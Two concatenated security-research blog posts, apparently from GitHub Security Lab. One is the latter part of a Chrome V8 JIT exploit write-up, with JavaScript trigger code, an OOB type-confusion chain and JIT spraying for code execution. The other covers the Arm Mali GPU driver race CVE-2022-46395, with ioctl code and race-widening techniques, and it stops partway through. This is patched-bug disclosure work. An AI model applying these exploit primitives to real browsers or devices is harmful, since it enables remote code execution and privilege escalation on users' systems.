
Amongst other things, EnsureHasInitialMap calls Map::SetPrototype on the prototype field of function. Calling Map::SetPrototype on an object can cause its layout to be optimized via the OptimizeAsPrototype call. In particular, if an object is a "fast" object that stores its fields as an array, OptimizeAsPrototype will change it into a "dictionary" object that stores its fields in a dictionary. (See, for example, Section 3.2 in "Exploiting Logic Bugs in JavaScript JIT Engines,” setting an object as the __proto__ field has the same effect as calling Map::SetPrototype on it.)
As explained before, PrepareInstall is called at the end of the compilation phase, so initially, I thought this may be exploited as a race condition to create a primitive similar to CVE-2018-17463 detailed in "Exploiting Logic Bugs in JavaScript JIT Engines.” After some debugging, I discovered that the PrepareInstall method is actually executed on the main thread and so this is not really a race condition.
Interrupt handling in V8
Although the PrepareInstall method is executed in the main thread, what is interesting is how the main thread switches between different tasks. In particular: how does the background thread notify the main thread to install the compilation dependency after the optimized code is compiled, and when can the main thread switch between normal Javascript execution and handling of tasks requested by other threads? It turns out that this is done via the StackGuard::HandleInterrupts method. In particular, when the compilation is finished in the background, an INSTALL_CODE task is put on a queue, which is then handled in HandleInterrupts in the main thread.
While the main thread is executing Javascript code, it checks for these interrupts at particular places by calling StackGuard::HandleInterrupts. This only happens at a limited number of places, for example, at the entry point of a Javascript function.
While looking for callers of StackGuard::HandleInterrupts, I discovered that the StackCheck node, which has the kNoWrite property, can in fact call StackGuard::HandleInterrupts. The optimized code for the StackCheck can make a call to the Runtime::kStackGuard function:
void JSGenericLowering::LowerJSStackCheck(Node* node) {
  Node* effect = NodeProperties::GetEffectInput(node);
  Node* control = NodeProperties::GetControlInput(node);
  ...
  if (stack_check_kind == StackCheckKind::kJSFunctionEntry) {
    node->InsertInput(zone(), 0,
    graph()->NewNode(machine()->LoadStackCheckOffset()));
    ReplaceWithRuntimeCall(node, Runtime::kStackGuardWithGap);
  } else {
    ReplaceWithRuntimeCall(node, Runtime::kStackGuard);
  }
}

which in turn calls HandleInterrupts:
RUNTIME_FUNCTION(Runtime_StackGuard) {
...
  return isolate->stack_guard()->HandleInterrupts(
  StackGuard::InterruptLevel::kAnyEffect);
}

As mentioned previously, kNoWrite is used to indicate that a node does not make changes to Javascript objects; however, because StackCheck can call HandleInterrupts, which could cause the prototype field object of a function to change from a fast object to a dictionary object, this kNoWrite property is incorrect and the StackCheck node can be used to change an object and bypass security checks in a way that is similar to CVE-2018-17463. The problem now is to figure out how to insert a StackCheck node in the TurboFan graph.
It turns out that the JumpLoop opcode that is inserted at the end of a loop iteration can be used to insert a StackCheck node:
void BytecodeGraphBuilder::VisitJumpLoop() {
  BuildIterationBodyStackCheck();
  BuildJump();
}

In the above, BuildIterationBodyStackCheck introduces a StackCheck node in the graph:
void BytecodeGraphBuilder::BuildIterationBodyStackCheck() {
  Node* node =
  NewNode(javascript()->StackCheck(StackCheckKind::kJSIterationBody));
  environment()->RecordAfterState(node, Environment::kAttachFrameState);
}

The idea is that, if a function is running a loop for a potentially long time, then it should check for interrupts after a number of iterations are run, in case it is blocking other operations. This means that, by creating a loop that runs for a large number of iterations, I can cause an optimized function to handle interrupts and potentially call EnsureHasInitialMap to change the layout of a Javascript object. So, to exploit the bug, I need to create two functions with the following properties:

A function bar that has the PrototypePropertyDependency when optimized, so that when HandleInterrupts is called, EnsureHasInitialMap is called and the prototype field of another function B (for the purpose of the exploit, I use a class constructor) will change from being a fast object to a dictionary object.
A function foo with a loop that accesses fields in the prototype field of the class constructor B both before and after the loop. The optimized code of foo that accesses B.prototype before the loop will insert a CheckMaps node to make sure the Map of B.prototype is correct. As the loop introduces a StackCheck node, it may call HandleInterrupts, which will change the Map of B.prototype. However, because StackCheck is marked with kNoWrite, a CheckMaps will not be inserted again prior to accessing properties of B.prototype after the loop. This results in optimized code accessing fields in B.prototype with incorrect offsets.
Optimize foo and wait until concurrent compilation is finished to make sure that foo is executed with optimized code from now on.
Run bar enough times to trigger concurrent compilation, and then run foo immediately. As long as the loop in foo is running long enough, the compilation of bar will finish while the loop is running and the compiler thread will queue an INSTALL_CODE task. The loop in foo will then handle this interrupt, which will call EnsureHasInitialMap for B to change B.prototype into a dictionary object. After the loop is finished, subsequent accesses to fields of B.prototype will be done using the wrong Map (by assuming that B.prototype is still a fast object).

This can then be exploited by causing an out-of-bounds (OOB) access in a Javascript object.
Exploiting the bug
The function bar can be created by looking for nodes that introduce a PrototypePropertyDependency, for example, the JSOrdinaryHasInstance node that is introduced when using instanceof in Javascript. So, for example, the following function:
function bar(x) {
  return x instanceof B;
}

will have a PrototypePropertyDependency that changes B.prototype to a dictionary object when bar is installed.
The function foo can be constructed as follows:
function foo(obj, proto, x,y) {
  //Introduce `CheckMaps` for `proto`
  obj.obj = proto;
  var z = 0;
  //Loop for handling interrupt
  for (let i = 0; i < 1; i++) {
    for (let j = 0; j < x; j++) {
      for (let k = 0; k < x; k++) {
        z = y[k];
      }
    }
  }
  //Access after map changed
  proto.b = 33;
  return z;
}

When setting proto to an object field that has a fixed map, a CheckMaps node is introduced to make sure that proto has the correct map, so by passing a constant obj to foo of the following form:
var obj = {obj: B.prototype};

I can introduce the CheckMaps node for B.prototype that I need in foo. After running the loop that handles the interrupt from bar, the field write proto.b = 33 will be writing to proto based on its fast map while it has already been changed into a dictionary map.
To exploit this, we need to understand the differences in fast objects and dictionary objects. The section "FixedArray and NumberDictionary Memory Layout'' in "Patch-gapping Google Chrome'' gives good details about this.
A fast object either stores fields within the object itself—(in-object properties) or in a PropertyArray when space runs out for in-object properties. In our case, B.prototype does not have any in-object properties and uses a PropertyArray to store its fields. A PropertyArray has three header fields, map and length and hash, which are at offsets 0, 4 and 8. Its elements start at offsets 0xc and are of size 4. When optimized code is accessing properties in B.prototype, it uses the element offset of the field in the PropertyArray to directly access the field. For example, in the following, when loading B.prototype.a, optimized code will load the element at offset 0xc from the PropertyArray, and the element at offset 0x10 for the field b:
class B {}
B.prototype.a = 1;
B.prototype.b = 2;

A dictionary object, on the other hand, stores fields in a NamedDictionary. A NamedDictionary is implemented using FixedArray, however, its element size and header size are different. It has the map and length fields, but does not have the hash field of a PropertyArray. In addition, NamedDictionary has some extra fields, including elements, deleted and capacity. In particular, when optimized code uses the field offsets from a PropertyArray to access a NamedDictionary, these extra fields can be overwritten. This, for example, can be used to overwrite the capacity of the NamedDictionary to cause an out-of-bounds access.

In the above, the field offset for field b in a PropertyArray aligns with that of capacity in the NamedDictionary and so writing to b will overwrite the capacity of the NamedDictionary. Since capacity is used in most bound calculations when accessing a NamedDictionary, this can be used to cause an OOB access.

As pointed out in "Patch-gapping Google Chrome" and "Exploiting Logic Bugs in JavaScript JIT Engines,” the main problem with exploiting an OOB access in a NamedDictionary is that, when looking for a key in the dictionary, a random hash is used to translate the key to an index. This randomness causes the layout of the dictionary to change with each run and accessing properties with the same key is going to result in an access of a random offset in the dictionary, which is unreliable and may result in a crash.
To overcome this, I adopted the solution in "Patch-gapping Google Chrome,” which is to set the capacity to a power-of-two plus one. This will cause any key access to the dictionary object to either access the NamedDictionary at offset 0, or at offset capacity. By placing objects carefully, I can use the dictionary to access an object placed at the offset capacity. While this is not 100% reliable, as there is a chance of accessing an object at offset 0, the failure would not cause a crash and can be easily detected. So, in case of a failure, I just have to reload the page to reinitialize the random hash and try again. (Another way to exploit this is to follow the approach in Section 4 of "Exploiting Logic Bugs in JavaScript JIT Engines.")
A NamedDictionary stores its elements in a tuple of the form (Key, Value, Attribute). When accessing an element with key k, the dictionary first converts k into an index. In our case, the index is either 0 or the capacity of the dictionary. It then checks that the element at the index has the same Key as k, if it is, Value is returned. So, in order to make a successful access, I need to create a fake NamedDictionary entry at offset capacity. This can be achieved by placing a fast object after the dictionary and using its field values to create the fake entry: a fast object stores its fields in a PropertyArray, which stores field values consecutively. By choosing the field values carefully so that the field value at the capacity offset of the NamedDictionary takes the value of the key k, the next value will be returned when the field k is accessed in the dictionary object:

For example, in the above, an object placed after the corrupted NamedDictionary will have some of its fields, vn, vn+1 and vn+2 stored at the offset corresponding to the corrupted capacity of the dictionary. Accessing the field with key k has a chance of interpreting vn, vn+1 and vn+2 as a fake element tuple (Key = vn, value = vn+1, Attribute = vn+2). By setting vn to k, vn+1 will be returned as the field k of the corrupted dictionary object. The significance of this is that I can now use the corrupted dictionary to create a type confusion.
Creating type confusion
The exploit flow now very much follows that of Section 4 in "Exploiting Logic Bugs in JavaScript JIT Engines.” In order to create a type confusion, I'll use another optimization in TurboFan. When loading an object property, if the property is known to be an object with a fixed Map, then TurboFan will omit CheckMaps for the property when it is accessed. For example, in the following function:
function tc(x) {
  var obj = x.p1.px;
  obj.x = 100;
}
var obj0 = {px : {x : 1}};
var obj1 = {p0 : str0, p1 : obj0, p2 : 0};
//optimizing tc
for (let i = 0; i < 20000; i++) {
  tc(obj1);
}

Because tc has only seen obj1 as an input when it is optimized, a CheckMaps will be inserted to check that x has the same Map as obj1. However, as obj1.p1 has the same Map (the Map of obj0) throughout, a CheckMaps is not inserted to check the Map of x.p1. In this case, the Map of x.p1 is ensured by checking the Map of x, as well as installing a compilation dependency that prevents it from changing. However, if I am able to use a memory corruption, such as the OOB access I constructed with the dictionary object, to modify the field p1 in obj1, then I can bypass these checks and cause the optimized code to access obj with a wrong Map. In particular, I can replace obj0.px by an Array object, causing obj.x = 100 to overwrite the length of the Array:
var corrupted_arr = [1.1];
var corrupted = {a : corrupted_arr};
...
//Overwrite `obj1.p1` to `corrupted`
Object.defineProperty(B.prototype, 'aaa', {value : corrupted, writable : true});
//obj.x = 100 in `tc` now overwrites length of `corrupted_arr`
tc(obj1);

In the above, I first use the bug to overwrite the capacity of the dictionary object B.prototype. I then align objects by placing obj0 behind B.prototype, such that the field aaa in B.prototype now gives me obj0.px. Then, by overwriting aaa in B.prototype, I can change obj1.p1 to a different object with a different Map. As this change does not involve setting a property in obj1, it does not invalidate the optimized code in the function tc. So, when tc is run again, a type confusion occurs and obj = x.p1.px will return corrupted_arr and setting obj.x = 100 will set the length of corrupted_arr to 100.

The above figure shows the field alignments between the objects.
Gaining code execution
Once an OOB access of a double array is achieved, the bug can be exploited as follows:

Place an Object Array after corrupted_arr, and use the OOB read primitive to read the addresses of the objects stored in this array. This allows me to obtain the address of any V8 object.
Place another double array, writeArr after corrupted_arr, and use the OOB write primitive in corrupted_arr to overwrite the element field of writeArr to an object address. Accessing the elements of writeArr then allows me to read/write to arbitrary addresses.
While this gives me arbitrary read and write primitives within the V8 heap and also obtains the address of any object, due to the recently introduced heap sandbox in V8, the V8 heap becomes fairly isolated and I still won't be able to access arbitrary memory within the renderer process. In particular, I can no longer use the standard method of overwriting the RWX pages that are used for storing WebAssembly code to achieve code execution. Instead, JIT spraying can be used to bypass the heap sandbox.
The idea of JIT spraying is that a pointer to the JIT optimized code of a function is stored in a Javascript Function object, by modifying this pointer using arbitrary read and write primitive within the V8 heap, I can make this pointer jump to the middle of the JIT code. If I use data structures, such as a double array, to store shell code as floating point numbers in the JIT code, then jumping to these data structures will allow me to execute arbitrary code. I refer readers to this post for more details.

The exploit can be found here with some set up notes.
Conclusion
Incorrect side effect modeling has long been a powerful exploit primitive and has been exploited multiple times, for example, in CVE-2018-17463 and CVE-2020-6418. In this case, the side effect property of the StackCheck node has become incorrect due to the introduction of concurrent compilation. This shows how delicate interactions between different and seemingly unrelated parts of Chrome can violate previous assumptions, resulting in often subtle and hard-to-detect issues.
The post Getting RCE in Chrome with incorrect side effect in the JIT compiler appeared first on The GitHub Blog.



Rooting with root cause: finding a variant of a Project Zero bug
Man Yue Mo — Thu, 25 May 2023 16:00:59 +0000
In this blog, I’ll look at CVE-2022-46395, a variant of Project Zero issue 2327 (CVE-2022-36449) and show how it can be used to gain arbitrary kernel code execution and root privileges from the untrusted app domain on an Android phone that uses the Arm Mali GPU. I used a Pixel 6 device for testing and reported the vulnerability to Arm on November 17, 2022. It was fixed in the Arm Mali driver version r42p0, which was released publicly on January 27, 2023, and fixed in Android in the May security update. I’ll go through imported memory in the Arm Mali driver, the root cause of Project Zero issue 2327, as well as exploiting a very tight race condition in CVE-2022-46395. A detailed timeline of this issue can be found here.
Imported memory in the Arm Mali driver
The Arm Mali GPU can be integrated in various devices (for example, see “Implementations” in Mali (GPU) Wikipedia entry). It has been an attractive target on Android phones and has been targeted by in-the-wild exploits multiple times.
In September 2022, Jann Horn of Google’s Project Zero disclosed a number of vulnerabilities in the Arm Mali GPU driver that were collectively assigned CVE-2022-36449. One of the issues, 2327, is particularly relevant to this research.
When using the Mali GPU driver, a user app first needs to create and initialize a kbase_context kernel object. This involves the user app opening the driver file and using the resulting file descriptor to make a series of ioctl calls. A kbase_context object is responsible for managing resources for each driver file that is opened and is unique for each file handle.
In particular, the kbase_context manages different types of memory that are shared between the GPU devices and user space applications. The Mali driver provides the KBASE_IOCTL_MEM_IMPORT ioctl that allows users to share memory with the GPU via direct I/O (see, for example, the “Performing Direct I/O” section here). In this setup, the shared memory is owned and managed by the user space application. While the kernel driver is using the memory, the get_user_pages function is used to increase the refcount of the user page so that it does not get freed while the kernel is using it.
Memory imported from user space using direct I/O are represented by a kbase_va_region with the KBASE_MEM_TYPE_IMPORTED_USER_BUF kbase_memory_type.
A kbase_va_region in the Mali GPU driver represents a shared memory region between the GPU device and the host device (CPU). It contains information such as the range of the GPU addresses and the size of the region. It also contains two kbase_mem_phy_alloc pointer fields, cpu_alloc and gpu_alloc, that are responsible for keeping track of the memory pages that are mapped to the GPU. In our setting, these two fields point to the same object, so I’ll only refer to them as the gpu_alloc from now on, and code snippets that use cpu_alloc should be understood to be applied to the gpu_alloc as well. In order to keep track of the pages that are currently being used by the GPU, the kbase_mem_phy_alloc contains an array, pages, that keeps track of these pages.
For KBASE_MEM_TYPE_IMPORTED_USER_BUF type of memory, the pages array in gpu_alloc is populated by using the get_user_pages function on the pages that are supplied by the user. This function increases the refcount of those pages, and then adds them to the pages array while they are in use by the GPU, and then removes them from pages and decreases their refcount once the GPU is no longer using the pages. This ensures that the pages won’t be freed while the GPU is using them.
Depending on whether the user passes the KBASE_REG_SHARED_BOTH flag when the memory is imported via the KBASE_IOCTL_MEM_IMPORT ioctl, the user pages are either added to pages when the memory region is imported (when KBASE_REG_SHARED_BOTH is set), or it is only added to pages when the memory is used at a later stage.
In the case where pages are populated when the memory is imported, the pages cannot be removed until the kbase_va_region and its gpu_alloc is freed. When KBASE_REG_SHARED_BOTH is not set and the pages are populated “on demand,” the memory management becomes more interesting.
Project zero issue 2327 (CVE-2022-36449)
When the pages of a KBASE_MEM_TYPE_IMPORTED_USER_BUF are not populated at import time, the memory can be used by submitting a GPU software job (“softjob”) that uses the imported memory as an external resource. I can submit a GPU job via the KBASE_IOCTL_JOB_SUBMIT ioctl with the BASE_JD_REQ_EXTERNAL_RESOURCES requirement, and specify the GPU address of the shared user memory as its external resource:
struct base_external_resource extres = {
    .ext_resource = user_buf_addr;           //<------ GPU address of the imported user buffer
  };
  struct base_jd_atom atom1 = {
    .atom_number = 0,
    .core_req = BASE_JD_REQ_EXTERNAL_RESOURCES,
    .nr_extres = 1,
    .extres_list = (uint64_t)&extres,
    ...
  };
  struct kbase_ioctl_job_submit js1 = {
    .addr = (uint64_t)&atom1,
    .nr_atoms = 1,
    .stride = sizeof(atom1)
  };
  ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &js1);

When a software job requires external memory resources that are mapped as KBASE_MEM_TYPE_IMPORTED_USER_BUF, the function kbase_jd_user_buf_map is called to insert the user pages into the pages array of the gpu_alloc of the kbase_va_region via the kbase_jd_user_buf_pin_pages call:
static int kbase_jd_user_buf_map(struct kbase_context *kctx,
        struct kbase_va_region *reg)
{
    ...
    int err = kbase_jd_user_buf_pin_pages(kctx, reg);   //<------ inserts user pages
    ...
}

At this point, the user pages have their refcount incremented by get_user_pages and the physical addresses of their underlying memory are inserted into the pages array.
Once the software job finishes using the external resources, kbase_jd_user_buf_unmap is used for removing the user pages from the pages array and then decrementing their refcounts.
The pages array, however, is not the only way that these memory pages may be accessed. The kernel driver may also create memory mappings for these pages that allow them to be accessed from the GPU and the CPU, and these memory mappings should be removed before the pages are removed from the pages array. For example, kbase_unmap_external_resource, the caller of kbase_jd_user_buf_unmap, takes care to remove the memory mappings in the GPU by calling kbase_mmu_teardown_pages:
void kbase_unmap_external_resource(struct kbase_context *kctx,
        struct kbase_va_region *reg, struct kbase_mem_phy_alloc *alloc)
{
    ...
    case KBASE_MEM_TYPE_IMPORTED_USER_BUF: {
        alloc->imported.user_buf.current_mapping_usage_count--;
        if (alloc->imported.user_buf.current_mapping_usage_count == 0) {
            bool writeable = true;
            if (!kbase_is_region_invalid_or_free(reg) &&
                    reg->gpu_alloc == alloc)
                kbase_mmu_teardown_pages(                   //kbdev,
                        &kctx->mmu,
                        reg->start_pfn,
                        kbase_reg_current_backed_size(reg),
                        kctx->as_nr);
            if (reg && ((reg->flags & (KBASE_REG_CPU_WR | KBASE_REG_GPU_WR)) == 0))
                writeable = false;
            kbase_jd_user_buf_unmap(kctx, alloc, writeable);
        }
    }
    ...
}

It is also possible to create mappings from these userspace pages to the CPU by calling mmap on the Mali drivers file with an appropriate page offset. When the userspace pages are removed, these CPU mappings should be removed by calling the kbase_mem_shrink_cpu_mapping function to prevent them from being accessed from the mmap'ed user space addresses. This, however, was not done when user pages were removed from the KBASE_MEM_TYPE_IMPORTED_USER_BUF memory region, meaning that, once the refcounts of these user pages were reduced in kbase_jd_user_buf_unmap, these pages could be freed while CPU mappings to these pages created by the Mali driver still had access to them. This, in particular, meant that after these pages were freed, they could still be accessed from the user application, creating a use-after-free condition for memory pages that was easy to exploit.
Root cause analysis can sometimes be more of an art than a science and there can be many valid, but different views of what causes a bug. While at one level, it may look like it is simply a case where some cleanup logic is missing when the imported user memory is removed, the bug also highlighted an interesting deviation in how imported memory is managed in the Mali GPU driver.
In general, shared memory in the Mali GPU driver is managed via the gpu_alloc of the kbase_va_region and there are two different cases where the backing pages of a region can be freed. First, if the gpu_alloc and the kbase_va_region themselves are freed, then the backing pages of the kbase_va_region are also going to be freed. To prevent this from happening, when the backing pages are used by the kernel, references of the corresponding gpu_alloc and kbase_va_region are usually taken to prevent them from being freed. When a CPU mapping is created via kbase_cpu_mmap, a kbase_cpu_mapping structure is created and stored as the vm_private_data of the created virtual memory (vm) area. The kbase_cpu_mapping stores and increases the refcount of both the kbase_va_region and gpu_alloc, preventing them from being freed while the vm area is in use.
static int kbase_cpu_mmap(struct kbase_context *kctx,
        struct kbase_va_region *reg,
        struct vm_area_struct *vma,
        void *kaddr,
        size_t nr_pages,
        unsigned long aligned_offset,
        int free_on_close)
{
    struct kbase_cpu_mapping *map;
    int err = 0;
    map = kzalloc(sizeof(*map), GFP_KERNEL);
    ...
    vma->vm_private_data = map;
    ...
    map->region = kbase_va_region_alloc_get(kctx, reg);
    ...
    map->alloc = kbase_mem_phy_alloc_get(reg->cpu_alloc);
    ...
}

When the memory region is of type KBASE_MEM_TYPE_NATIVE, its backing pages are owned and maintained by memory region, the backing pages can also be freed by shrinking the backing store. For example, using the KBASE_IOCTL_MEM_COMMIT ioctl, would call kbase_mem_shrink to remove the backing pages:
int kbase_mem_shrink(struct kbase_context *const kctx,
        struct kbase_va_region *const reg, u64 new_pages)
{
    ...
    err = kbase_mem_shrink_gpu_mapping(kctx, reg,
            new_pages, old_pages);
    if (err >= 0) {
        /* Update all CPU mapping(s) */
        kbase_mem_shrink_cpu_mapping(kctx, reg,
                new_pages, old_pages);
        kbase_free_phy_pages_helper(reg->cpu_alloc, delta);
        ...
    }
    ...
}

In the above, both kbase_mem_shrink_gpu_mapping and kbase_mem_shrink_cpu_mapping are called to remove potential uses of the backing pages before they are freed. As kbase_mem_shrink frees the backing pages by calling kbase_free_phy_pages_helper, it only makes sense to shrink a region where the backing store is owned by the GPU. Even in this case, care must be taken to remove potential references to the backing pages before freeing them. For other types of memory, references to the backing pages may exist outside of the memory region, resizing it is generally forbidden and the pages array is immutable throughout the lifetime of the gpu_alloc. In this case, the backing pages should live as long as the gpu_alloc.
This makes the semantics of KBASE_MEM_TYPE_IMPORTED_USER_BUF region interesting. While it’s backing pages are owned by the user space application that creates it, as we have seen, its backing store, which is stored in the pages array of its gpu_alloc, can indeed change and backing pages can be freed while the gpu_alloc is still alive. Recall that if KBASE_REG_SHARED_BOTH is not set when the region is created, its backing store will only be set when it is used as an external resource in a GPU job, in which kbase_jd_user_buf_pin_pages is called to insert user pages to its backing store:
static int kbase_jd_user_buf_map(struct kbase_context *kctx,
        struct kbase_va_region *reg)
{
    ...
    int err = kbase_jd_user_buf_pin_pages(kctx, reg);   //<------ inserts user pages
    ...
}

The backing store then shrinks back to zero after the job has finished using the memory region by calling kbase_jd_user_buf_unmap. This, as we have seen, can result in cleanup logic from kbase_mem_shrink being omitted by mistake due to the need to reimplement complex memory management logic. However, this also means the backing store of a region can be removed without going through kbase_mem_shrink or freeing the region, which is unusual and may break the assumptions made in other parts of the code.
CVE-2022-46395
The idea is to look for code that accesses the backing store of a memory region and see if it implicitly assumes that the backing store is only removed when either of the followings happens:

When the memory region is freed, or
When the backing store is shrunk by the kbase_mem_shrink call

It turns out that the kbase_vmap_prot function had made these assumptions. The function kbase_vmap_prot is used by the driver to temporarily map the backing pages of a memory region to the kernel address space via vmap so that it can access them. It calls kbase_vmap_phy_pages to perform the mapping. To prevent the region from being freed while the vmap is valid, a kbase_vmap_struct is created for the lifetime of the mapping, which also holds a reference to the gpu_alloc of the kbase_va_region:
static int kbase_vmap_phy_pages(struct kbase_context *kctx,
        struct kbase_va_region *reg, u64 offset_bytes, size_t size,
        struct kbase_vmap_struct *map)
{
    ...
    map->cpu_alloc = reg->cpu_alloc;
    ...
    map->gpu_alloc = reg->gpu_alloc;
    ...
    kbase_mem_phy_alloc_kernel_mapped(reg->cpu_alloc);
    return 0;
}

The refcounts of map->cpu_alloc and map->gpu_alloc are incremented in kbase_vmap_prot before entering this function. To prevent the backing store from being shrunk by kbase_mem_commit, kbase_vmap_phy_pages also calls kbase_mem_phy_alloc_kernel_mapped, which increments kernel_mappings in the gpu_alloc:
static inline void
kbase_mem_phy_alloc_kernel_mapped(struct kbase_mem_phy_alloc *alloc)
{
    atomic_inc(&alloc->kernel_mappings);
}

This prevents kbase_mem_commit from shrinking the backing store of the memory region while it is mapped by kbase_vmap_prot, as kbase_mem_commit will check the kernel_mappings of a memory region:
int kbase_mem_commit(struct kbase_context *kctx, u64 gpu_addr, u64 new_pages)
{
    ...
    if (atomic_read(®->cpu_alloc->kernel_mappings) > 0)
        goto out_unlock;
    ...
}

When kbase_mem_shrink is used outside of kbase_mem_commit, it is always used within the jctx.lock of the corresponding kbase_context. As mappings created by kbase_vmap_prot are only valid with this lock held, other uses of kbase_mem_shrink cannot free the backing pages while the mappings are in use either.
However, as we have seen, a KBASE_MEM_TYPE_IMPORTED_USER_BUF memory region can remove its backing store without going through kbase_mem_shrink. In fact, the KBASE_IOCTL_STICKY_RESOURCE_UNMAP can be used to trigger kbase_unmap_external_resource to remove its backing pages without holding the jctx.lock of the kbase_context. This means that many uses of kbase_vmap_prot are vulnerable to a race condition that can remove its vmap'ed page while the mapping is in use, causing a use-after-free in the memory pages. For example, the KBASE_IOCTL_SOFT_EVENT_UPDATE ioctl calls the kbase_write_soft_event_status, which uses kbase_vmap_prot to create a mapping, and then unmap it after the kernel finishes writing to it:
static int kbasep_write_soft_event_status(
        struct kbase_context *kctx, u64 evt, unsigned char new_status)
{
    ...
    mapped_evt = kbase_vmap_prot(kctx, evt, sizeof(*mapped_evt),
                     KBASE_REG_CPU_WR, &map);
    //Race window start
    if (!mapped_evt)                            
        return -EFAULT;
    *mapped_evt = new_status;
    //Race window end
    kbase_vunmap(kctx, &map);
    return 0;
}

If the memory region that evt belongs to is of type KBASE_MEM_TYPE_IMPORTED_USER_BUF, then between kbase_vmap_prot and kbase_vunmap, the memory region can have its backing pages removed by another thread using the KBASE_IOCTL_STICKY_RESOURCE_UNMAP ioctl. There are other uses of kbase_vmap_prot in the driver, but they follow a similar usage pattern and the use in KBASE_IOCTL_SOFT_EVENT_UPDATE has a simpler call graph, so I’ll stick to it in this research.
The problem? The race window is very, very tiny.
Winning a tight race and widening the race window
The race window in this case is very tight and consists of very few instructions, so even hitting it is hard enough, let alone trying to free and replace the backing pages inside this tiny window. In the past, I’ve used a technique from Exploiting race conditions on [ancient] Linux of Jann Horn to widen the race window. While the technique can certainly be used to widen the race window here, it lacks the fine control in timing that I need here to hit the small race window. Fortunately, another technique that was also developed by Jann Horn in Racing against the clock—hitting a tiny kernel race window is just what I need here.
The main idea of controlling race windows on the Linux kernel using these techniques is to interrupt a task inside the race window, causing it to pause. By controlling the timing of interrupts and the length of these pauses, the race window can be widened to allow other tasks to run within it. In the Linux kernel, there are different ways in which a task can be interrupted.
The technique in Exploiting race conditions on [ancient] Linux uses task priorities to manipulate interrupts. The idea is to pin a low priority task on a CPU, and then run another task with high priority on the same CPU during the race window. The Linux kernel scheduler will then interrupt the low priority task to allow the high priority task to run. While this can stop the low priority task for a long time, depending on how long it takes the high priority task to run, it is difficult to control the precise timing of the interrupt.
The Linux kernel also provides APIs that allow users to schedule an interrupt at a precise time in the future. This allows more fine-grain control in the timing of the interrupts and was explored in Racing against the clock—hitting a tiny kernel race window. One such API is the timerfd. A timerfd is a file descriptor where its availability can be scheduled using the hardware timer. By using the timerfd_settime syscall, I can create a timerfd, and schedule it to be ready for use in a future time. If I have epoll instances that monitor the timerfd, then by the time the timerfd is ready, the epoll instances will be iterated through and be woken up.

  migrate_to_cpu(0);   //<------- pin this task to a cpu

  int tfd = timerfd_create(CLOCK_MONOTONIC, 0);   //<----- creates timerfd
  //Adds epoll watchers
  int epfds[NR_EPFDS];
  for (int i=0; i

In the above, I created a timerfd, tfd, using timerfd_create, and then added epoll watchers to it using the epoll_ctl syscall. After this, I schedule tfd to be available at a precise time in the future, and then run the KBASE_IOCTL_SOFT_EVENT_UPDATE ioctl. If the tfd becomes available while the KBASE_IOCTL_SOFT_EVENT_UPDATE is running, then it’ll be interrupted and the epoll watchers of tfd are processed instead. By creating a large list of epoll watchers and scheduling tfd so that it becomes available inside the race window of KBASE_IOCTL_SOFT_EVENT_UPDATE, I can widen the race window enough to free and replace the backing stores of my KBASE_MEM_TYPE_IMPORTED_USER_BUF memory region. Having said that, the race window is still very difficult to hit and most attempts to trigger the bug will fail. This means that I need some ways to tell whether the bug has triggered before I continue with the next step of the exploit. Recall that the race window happens between the calls kbase_vmap_prot and kbase_vunmap:
static int kbasep_write_soft_event_status(
        struct kbase_context *kctx, u64 evt, unsigned char new_status)
{
    ...
    mapped_evt = kbase_vmap_prot(kctx, evt, sizeof(*mapped_evt),
                     KBASE_REG_CPU_WR, &map);
    //Race window start
    if (!mapped_evt)                            
        return -EFAULT;
    *mapped_evt = new_status;
    //Race window end
    kbase_vunmap(kctx, &map);
    return 0;
}

The call kbase_vmap_prot holds the kctx->reg_lock for almost the entire duration of the function:
void *kbase_vmap_prot(struct kbase_context *kctx, u64 gpu_addr, size_t size,
              unsigned long prot_request, struct kbase_vmap_struct *map)
{
    struct kbase_va_region *reg;
    void *addr = NULL;
    u64 offset_bytes;
    struct kbase_mem_phy_alloc *cpu_alloc;
    struct kbase_mem_phy_alloc *gpu_alloc;
    int err;
    kbase_gpu_vm_lock(kctx);         //reg_lock
    ...
out_unlock:
    kbase_gpu_vm_unlock(kctx);      //reg_lock
    return addr;
fail_vmap_phy_pages:
    kbase_gpu_vm_unlock(kctx);
    kbase_mem_phy_alloc_put(cpu_alloc);
    kbase_mem_phy_alloc_put(gpu_alloc);
    return NULL;
}

A common case of failure is when the interrupt happens during the kbase_vmap_prot function. In this case, the kctx->reg_lock, which is a mutex, is held. To test whether the mutex is held when the interrupt happens, I can make an ioctl call that requires the kctx->reg_lock during the interrupt from a different thread. There are many options, and I choose KBASE_IOCTL_MEM_FREE because this requires the kctx->reg_lock most of the time and can be made to return early if an invalid argument is supplied. If the kctx->reg_lock is held by KBASE_IOCTL_SOFT_EVENT_UPDATE (which calls kbase_vmap_prot) while the interrupt happens, then KBASE_IOCTL_MEM_FREE cannot proceed and would return after the KBASE_IOCTL_SOFT_EVENT_UPDATE. Otherwise, the KBASE_IOCTL_MEM_FREE ioctl will return first. By comparing the time when these ioctl calls return, I can determine whether the interrupt happened inside the kctx->reg_lock. Moreover, if the interrupt happens inside kbase_vmap_prot, then the address evt that I supplied to kbasep_write_soft_event_status would not have been written to.
So, if both of the following are true, then I know the interrupt must have happened before the race window ended, but not inside the kbase_vmap_prot function:

If an KBASE_IOCTL_MEM_FREE started during the interrupt in another thread returns before the KBASE_IOCTL_SOFT_EVENT_UPDATE
The address evt has not been written to

The above conditions, however, can still be true if the interrupt happens before kbase_vmap_prot. In this case, if I remove the backing pages from the KBASE_MEM_TYPE_IMPORTED_USER_BUF memory region, then the kbase_vmap_prot call would simply fail because the address evt, which belongs to the memory region, is no longer invalid. This then results in the KBASE_IOCTL_SOFT_EVENT_UPDATE returning an error.
This gives me an indicator of when the interrupt happened and whether I should proceed with the exploit or try triggering the bug again. To decide whether the race is won, I can then do the following during the interrupt:

Check if evt is written to, if it is, then the interrupt happened too late and the race was lost.
If evt is not written to, then make a KBASE_IOCTL_MEM_FREE ioctlfrom another thread. If the ioctl returns and before the KBASE_IOCTL_SOFT_EVENT_UPDATE ioctl that is being interrupted, then proceed to the next step, otherwise, the interrupt happened inside kbase_vmap_prots and the race was lost. (interrupt happens too early).
Proceed to remove the backing pages of the KBASE_MEM_TYPE_IMPORTED_USER_BUF region that evt belongs to. If the KBASE_IOCTL_SOFT_EVENT_UPDATE ioctl returns an error, then the interrupt happened before the kbase_vmap_prot call and the race was lost. Otherwise, the race is likely won and I can proceed to the next stage in the exploit.

